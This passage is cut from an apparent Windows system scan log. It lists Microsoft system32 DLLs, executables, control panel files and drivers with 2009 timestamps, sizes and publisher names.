2009-09-24 10:13 - 2009-04-11 00:28 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\adsmsext.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\iashlpr.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000069632 _____ (Microsoft Corporation) C:\Windows\system32\rastapi.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000061440 _____ (Microsoft Corporation) C:\Windows\system32\wscsvc.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000061440 _____ (Microsoft Corporation) C:\Windows\system32\msjter40.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\SLUINotify.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\DevicePairingProxy.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\iasdatastore.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\msstrc.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000041984 _____ (Microsoft Corporation) C:\Windows\system32\mimefilt.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\bthserv.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000038400 _____ (Microsoft Corporation) C:\Windows\system32\rtffilt.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000035328 _____ (Microsoft Corporation) C:\Windows\system32\msscb.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000029184 _____ (Microsoft Corporation) C:\Windows\system32\wsepno.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\hidserv.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000024064 _____ (Microsoft Corporation) C:\Windows\system32\fdProxy.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\spcmsg.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000011776 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000009728 _____ (Microsoft Corporation) C:\Windows\system32\fdBthProxy.dll
2009-09-24 10:13 - 2009-04-11 00:27 - 001122304 _____ (Microsoft Corporation) C:\Windows\system32\appwiz.cpl
2009-09-24 10:13 - 2009-04-11 00:27 - 000704512 _____ (Microsoft Corporation) C:\Windows\system32\PhotoScreensaver.scr
2009-09-24 10:13 - 2009-04-11 00:27 - 000656896 _____ (Microsoft Corporation) C:\Windows\system32\autoconv.exe
2009-09-24 10:13 - 2009-04-11 00:27 - 000643072 _____ (Microsoft Corporation) C:\Windows\system32\autochk.exe
2009-09-24 10:13 - 2009-04-11 00:27 - 000636416 _____ (Microsoft Corporation) C:\Windows\system32\autofmt.exe
2009-09-24 10:13 - 2009-04-11 00:27 - 000627200 _____ (Microsoft Corporation) C:\Windows\system32\sethc.exe
2009-09-24 10:13 - 2009-04-11 00:27 - 000389632 _____ (Microsoft Corporation) C:\Windows\system32\sysmon.ocx
2009-09-24 10:13 - 2009-04-11 00:27 - 000241128 _____ (Microsoft Corporation) C:\Windows\system32\rsaenh.dll
2009-09-24 10:13 - 2009-04-11 00:27 - 000230912 _____ (Microsoft Corporation) C:\Windows\system32\diskraid.exe
2009-09-24 10:13 - 2009-04-11 00:27 - 000194048 _____ (Microsoft Corporation) C:\Windows\system32\drvinst.exe
2009-09-24 10:13 - 2009-04-11 00:27 - 000182272 _____ (Microsoft Corporation) C:\Windows\system32\osk.exe
2009-09-24 10:13 - 2009-04-11 00:27 - 000130024 _____ (Microsoft Corporation) C:\Windows\system32\basecsp.dll
2009-09-24 10:13 - 2009-04-11 00:27 - 000119808 _____ (Microsoft Corporation) C:\Windows\system32\diskpart.exe
2009-09-24 10:13 - 2009-04-11 00:27 - 000093696 _____ (Microsoft Corporation) C:\Windows\system32\Kswdmcap.ax
2009-09-24 10:13 - 2009-04-11 00:27 - 000088576 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2009-09-24 10:13 - 2009-04-11 00:27 - 000081920 _____ (Microsoft Corporation) C:\Windows\system32\dwm.exe
2009-09-24 10:13 - 2009-04-11 00:27 - 000061952 _____ (Microsoft Corporation) C:\Windows\system32\reg.exe
2009-09-24 10:13 - 2009-04-11 00:27 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\findstr.exe
2009-09-24 10:13 - 2009-04-11 00:27 - 000057344 _____ (Microsoft Corporation) C:\Windows\system32\logman.exe
2009-09-24 10:13 - 2009-04-11 00:23 - 000124928 _____ (Microsoft Corporation) C:\Windows\system32\quick.ime
2009-09-24 10:13 - 2009-04-11 00:23 - 000124928 _____ (Microsoft Corporation) C:\Windows\system32\qintlgnt.ime
2009-09-24 10:13 - 2009-04-11 00:23 - 000124928 _____ (Microsoft Corporation) C:\Windows\system32\phon.ime
2009-09-24 10:13 - 2009-04-11 00:22 - 000413696 _____ (Microsoft Corporation) C:\Windows\system32\imkr80.ime
2009-09-24 10:13 - 2009-04-11 00:22 - 000124928 _____ (Microsoft Corporation) C:\Windows\system32\cintlgnt.ime
2009-09-24 10:13 - 2009-04-11 00:22 - 000124928 _____ (Microsoft Corporation) C:\Windows\system32\chajei.ime
2009-09-24 10:13 - 2009-04-10 22:45 - 000185856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2009-09-24 10:13 - 2009-02-18 12:39 - 000092918 _____ C:\Windows\system32\slmgr.vbs
2009-09-24 10:13 - 2009-02-18 12:38 - 000035168 _____ (Microsoft Corporation) C:\Windows\system32\infocardcpl.cpl
2009-09-24 10:12 - 2009-04-11 00:28 - 006103040 _____ (Microsoft Corporation) C:\Windows\system32\chtbrkr.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 003072000 _____ (Microsoft Corporation) C:\Windows\system32\networkmap.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 002515968 _____ (Microsoft Corporation) C:\Windows\system32\accessibilitycpl.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 002226688 _____ (Microsoft Corporation) C:\Windows\system32\networkexplorer.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 002225664 _____ (Microsoft Corporation) C:\Windows\system32\netcenter.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 002153472 _____ (Microsoft Corporation) C:\Windows\system32\oobefldr.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 001671680 _____ (Microsoft Corporation) C:\Windows\system32\wlanpref.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 001645568 _____ (Microsoft Corporation) C:\Windows\system32\connect.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 001580544 _____ (Microsoft Corporation) C:\Windows\system32\wpccpl.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 001544704 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 001248768 _____ (Microsoft Corporation) C:\Windows\system32\PerfCenterCPL.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 001224192 _____ (Microsoft Corporation) C:\Windows\system32\sud.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 001152000 _____ (Microsoft Corporation) C:\Windows\system32\themecpl.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 001123840 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000842240 _____ (Microsoft Corporation) C:\Windows\system32\systemcpl.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000825856 _____ (Microsoft Corporation) C:\Windows\system32\rasdlg.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000777216 _____ (Microsoft Corporation) C:\Windows\system32\slcc.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000723968 _____ (Microsoft Corporation) C:\Windows\system32\powercpl.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000657408 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2009-09-24 10:12 - 2009-04-11 00:28 - 000642560 _____ (Microsoft Corporation) C:\Windows\system32\rasgcw.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000547840 _____ (Microsoft Corporation) C:\Windows\system32\wiaaut.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000542720 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000542208 _____ (Microsoft Corporation) C:\Windows\system32\pnpui.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000533504 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000532992 _____ (Microsoft Corporation) C:\Windows\system32\wpcao.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000516608 _____ (Microsoft Corporation) C:\Windows\system32\autoplay.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000481792 _____ (Microsoft Corporation) C:\Windows\system32\cmdial32.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000464384 _____ (Microsoft Corporation) C:\Windows\system32\pcaui.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000445952 _____ (Microsoft Corporation) C:\Windows\system32\ncryptui.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000425472 _____ (Microsoft Corporation) C:\Windows\system32\shwebsvc.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000414208 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000378368 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000376832 _____ (Microsoft Corporation) C:\Windows\system32\rasplap.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000356864 _____ (Microsoft Corporation) C:\Windows\system32\MediaMetadataHandler.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000313344 _____ (Microsoft Corporation) C:\Windows\system32\thawbrkr.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000303616 _____ (Microsoft Corporation) C:\Windows\system32\wmpeffects.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\modemui.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000284672 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000281088 _____ (Microsoft Corporation) C:\Windows\system32\raschap.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000275968 _____ (Microsoft Corporation) C:\Windows\system32\SnippingTool.exe
2009-09-24 10:12 - 2009-04-11 00:28 - 000259584 _____ (Microsoft Corporation) C:\Windows\system32\rasppp.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000245760 _____ (Microsoft Corporation) C:\Windows\system32\scansetting.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000242688 _____ (Microsoft Corporation) C:\Windows\system32\tapisrv.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000218624 _____ (Microsoft Corporation) C:\Windows\system32\mscandui.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000217600 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000202752 _____ (Microsoft Corporation) C:\Windows\system32\wlanui.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000200704 _____ (Microsoft Corporation) C:\Windows\system32\input.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000187904 _____ (Microsoft Corporation) C:\Windows\system32\eapp3hst.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000185856 _____ (Microsoft Corporation) C:\Windows\system32\SLLUA.exe
2009-09-24 10:12 - 2009-04-11 00:28 - 000180736 _____ (Microsoft Corporation) C:\Windows\system32\netplwiz.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000178176 _____ (Microsoft Corporation) C:\Windows\system32\credui.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000177664 _____ (Microsoft Corporation) C:\Windows\system32\WSDMon.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000177152 _____ (Microsoft Corporation) C:\Windows\system32\scecli.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000175616 _____ (Microsoft Corporation) C:\Windows\system32\dot3svc.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000170496 _____ (Microsoft Corporation) C:\Windows\system32\tcpipcfg.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000166400 _____ (Microsoft Corporation) C:\Windows\system32\puiapi.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000163328 _____ (Microsoft Corporation) C:\Windows\system32\msutb.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000155136 _____ (Microsoft Corporation) C:\Windows\system32\rasmontr.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000147456 _____ (Microsoft Corporation) C:\Windows\system32\Faultrep.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000142336 _____ (Microsoft Corporation) C:\Windows\system32\fontext.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000140288 _____ (Microsoft Corporation) C:\Windows\system32\wpcsvc.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000140288 _____ (Microsoft Corporation) C:\Windows\system32\scksp.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000137728 _____ (Microsoft Corporation) C:\Windows\system32\dsprop.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\eappcfg.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000135168 _____ (Microsoft Corporation) C:\Windows\system32\tcpmon.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000134656 _____ (Microsoft Corporation) C:\Windows\system32\SmartcardCredentialProvider.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000128000 _____ (Microsoft Corporation) C:\Windows\system32\vdsutil.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000127488 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000125952 _____ (Microsoft Corporation) C:\Windows\system32\softkbd.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000121344 _____ (Microsoft Corporation) C:\Windows\system32\ntmarta.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000115712 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000114688 _____ (Microsoft Corporation) C:\Windows\system32\imm32.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000107008 _____ (Microsoft Corporation) C:\Windows\system32\rdpwsx.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000105472 _____ (Microsoft Corporation) C:\Windows\system32\dmsynth.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000101888 _____ (Microsoft Corporation) C:\Windows\system32\dmusic.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000101376 _____ (Microsoft Corporation) C:\Windows\system32\shsetup.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\powrprof.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000097792 _____ (Microsoft Corporation) C:\Windows\system32\oleprn.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000097792 _____ (Microsoft Corporation) C:\Windows\system32\mprapi.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000095232 _____ (Microsoft Corporation) C:\Windows\system32\SCardSvr.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000093696 _____ (Microsoft Corporation) C:\Windows\system32\eappgnui.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000090112 _____ (Microsoft Corporation) C:\Windows\system32\wshext.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000088576 _____ (Microsoft Corporation) C:\Windows\system32\olepro32.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000085504 _____ (Microsoft Corporation) C:\Windows\system32\msctfui.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000084992 _____ (Microsoft Corporation) C:\Windows\system32\mstlsapi.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000083456 _____ (Microsoft) C:\Windows\system32\SMBHelperClass.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000083456 _____ (Microsoft Corporation) C:\Windows\system32\wlgpclnt.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000079872 _____ (Microsoft Corporation) C:\Windows\system32\authz.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\iassvcs.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\dot3msm.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000069632 _____ (Microsoft Corporation) C:\Windows\system32\sendmail.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000069632 _____ (Microsoft Corporation) C:\Windows\system32\PNPXAssoc.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000069120 _____ (Microsoft Corporation) C:\Windows\system32\fdWCN.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000068608 _____ (Microsoft Corporation) C:\Windows\system32\mpr.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000068096 _____ (Microsoft Corporation) C:\Windows\system32\fdSSDP.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000067584 _____ (Microsoft Corporation) C:\Windows\system32\regapi.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000067072 _____ (Microsoft Corporation) C:\Windows\system32\fdWSD.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\tscupgrd.exe
2009-09-24 10:12 - 2009-04-11 00:28 - 000058880 _____ (Microsoft Corporation) C:\Windows\system32\iasacct.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000057344 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000057344 _____ (Microsoft Corporation) C:\Windows\system32\iasads.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000055808 _____ (Microsoft Corporation) C:\Windows\system32\Storprop.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000054272 _____ (Microsoft Corporation) C:\Windows\system32\feclient.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000053760 _____ (Microsoft Corporation) C:\Windows\system32\fdeploy.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000052736 _____ (Microsoft Corporation) C:\Windows\system32\rasdiag.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000052224 _____ (Microsoft Corporation) C:\Windows\system32\mmci.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000050688 _____ (Microsoft Corporation) C:\Windows\system32\wsnmp32.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000049664 _____ (Microsoft Corporation) C:\Windows\system32\dot3cfg.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000048128 _____ (Microsoft Corporation) C:\Windows\system32\l2nacp.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\bthci.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000045056 _____ (Microsoft Corporation) C:\Windows\system32\dataclen.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000042496 _____ (Microsoft Corporation) C:\Windows\system32\slcinst.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\hbaapi.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000040448 _____ (Microsoft Corporation) C:\Windows\system32\certprop.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000039936 _____ (Microsoft Corporation) C:\Windows\system32\networkitemfactory.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000038400 _____ (Microsoft Corporation) C:\Windows\system32\TSTheme.exe
2009-09-24 10:12 - 2009-04-11 00:28 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\wshbth.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\iaspolcy.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\wscapi.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\perfdisk.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\cscapi.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000031232 _____ (Microsoft Corporation) C:\Windows\system32\whealogr.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000031232 _____ (Microsoft Corporation) C:\Windows\system32\msimtf.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000029696 _____ (Microsoft Corporation) C:\Windows\system32\ifmon.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000029184 _____ (Microsoft Corporation) C:\Windows\system32\uxsms.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\FwRemoteSvr.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\msjint40.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\cscdll.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000020992 _____ (Microsoft Corporation) C:\Windows\system32\wsdchngr.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000020992 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000020480 _____ (Microsoft Corporation) C:\Windows\system32\version.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000019456 _____ (Microsoft Corporation) C:\Windows\system32\MsCtfMonitor.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\wscisvif.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\msisip.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\mmcico.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000011776 _____ (Microsoft Corporation) C:\Windows\system32\spwinsat.dll
2009-09-24 10:12 - 2009-04-11 00:28 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\CHxReadingStringIME.dll
2009-09-24 10:12 - 2009-04-11 00:27 - 001689600 _____ (Microsoft Corporation) C:\Windows\system32\wscui.cpl
2009-09-24 10:12 - 2009-04-11 00:27 - 001102848 _____ (Microsoft Corporation) C:\Windows\system32\mmsys.cpl
2009-09-24 10:12 - 2009-04-11 00:27 - 000408064 _____ (Microsoft Corporation) C:\Windows\system32\msinfo32.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000407040 _____ (Microsoft Corporation) C:\Windows\system32\dpapimig.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000280064 _____ (Microsoft Corporation) C:\Windows\system32\unimdm.tsp
2009-09-24 10:12 - 2009-04-11 00:27 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\certreq.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000167424 _____ (Microsoft Corporation) C:\Windows\system32\wdmaud.drv
2009-09-24 10:12 - 2009-04-11 00:27 - 000128000 _____ (Microsoft Corporation) C:\Windows\system32\gpresult.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000094720 _____ (Microsoft Corporation) C:\Windows\system32\logagent.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000082944 _____ (Microsoft Corporation) C:\Windows\system32\nslookup.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000080896 _____ (Microsoft Corporation) C:\Windows\system32\MSNP.ax
2009-09-24 10:12 - 2009-04-11 00:27 - 000080384 _____ (Microsoft Corporation) C:\Windows\system32\hdwwiz.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000074752 _____ (Microsoft Corporation) C:\Windows\system32\newdev.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000069120 _____ (Microsoft Corporation) C:\Windows\system32\conime.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000058368 _____ (Microsoft Corporation) C:\Windows\system32\PnPUnattend.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000058368 _____ (Microsoft Corporation) C:\Windows\system32\cipher.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000049152 _____ (Microsoft Corporation) C:\Windows\system32\cmmon32.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\rekeywiz.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000041984 _____ (Microsoft Corporation) C:\Windows\system32\ftp.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000035840 _____ (Microsoft Corporation) C:\Windows\system32\ocsetup.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\bthudtask.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\PnPutil.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000026624 _____ (Microsoft Corporation) C:\Windows\system32\ipconfig.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\DeviceEject.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000021504 _____ (Microsoft Corporation) C:\Windows\system32\msacm32.drv
2009-09-24 10:12 - 2009-04-11 00:27 - 000019968 _____ (Microsoft Corporation) C:\Windows\system32\fc.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000016896 _____ (Microsoft Corporation) C:\Windows\system32\rasdial.exe
2009-09-24 10:12 - 2009-04-11 00:27 - 000016896 _____ (Microsoft Corporation) C:\Windows\system32\gpupdate.exe
2009-09-24 10:12 - 2009-04-11 00:23 - 000125952 _____ (Microsoft Corporation) C:\Windows\system32\tintlgnt.ime
2009-09-24 10:12 - 2009-04-11 00:23 - 000089088 _____ (Microsoft Corporation) C:\Windows\system32\pintlgnt.ime
2009-09-24 10:12 - 2009-04-10 22:46 - 000121344 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndiswan.sys
2009-09-24 10:12 - 2009-04-10 22:46 - 000069120 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rassstp.sys
2009-09-24 10:12 - 2009-04-10 22:45 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rmcast.sys
2009-09-24 10:12 - 2009-04-10 22:45 - 000072192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2009-09-24 10:12 - 2009-04-10 22:45 - 000072192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pacer.sys
2009-09-24 10:12 - 2009-04-10 22:45 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\smb.sys
2009-09-24 10:12 - 2009-04-10 22:43 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\nwifi.sys
2009-09-24 10:12 - 2009-04-10 22:42 - 000039424 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hidclass.sys
2009-09-24 10:12 - 2009-04-10 22:42 - 000025856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBCAMD2.sys
2009-09-24 10:12 - 2009-04-10 22:42 - 000025856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBCAMD.sys
2009-09-24 10:12 - 2009-04-10 22:42 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hidusb.sys
2009-09-24 10:12 - 2009-04-10 22:39 - 000067072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cdrom.sys
2009-09-24 10:12 - 2009-04-10 22:38 - 000149504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ks.sys
2009-09-24 10:12 - 2009-04-10 22:22 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\watchdog.sys
2009-09-24 10:12 - 2009-04-10 22:14 - 000035328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\npfs.sys
2009-09-24 10:12 - 2009-04-10 22:13 - 000226816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\udfs.sys
2009-09-24 10:12 - 2009-04-10 22:13 - 000136704 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\exfat.sys
2009-09-24 10:11 - 2009-04-11 00:28 - 000705536 _____ (Microsoft Corporation) C:\Windows\system32\SmiEngine.dll
2009-09-24 10:11 - 2009-04-11 00:28 - 000247808 _____ (Microsoft Corporation) C:\Windows\system32\drvstore.dll
2009-09-24 10:11 - 2009-04-11 00:28 - 000218624 _____ (Microsoft Corporation) C:\Windows\system32\wdscore.dll
2009-09-24 10:11 - 2009-04-11 00:28 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\odbcconf.dll
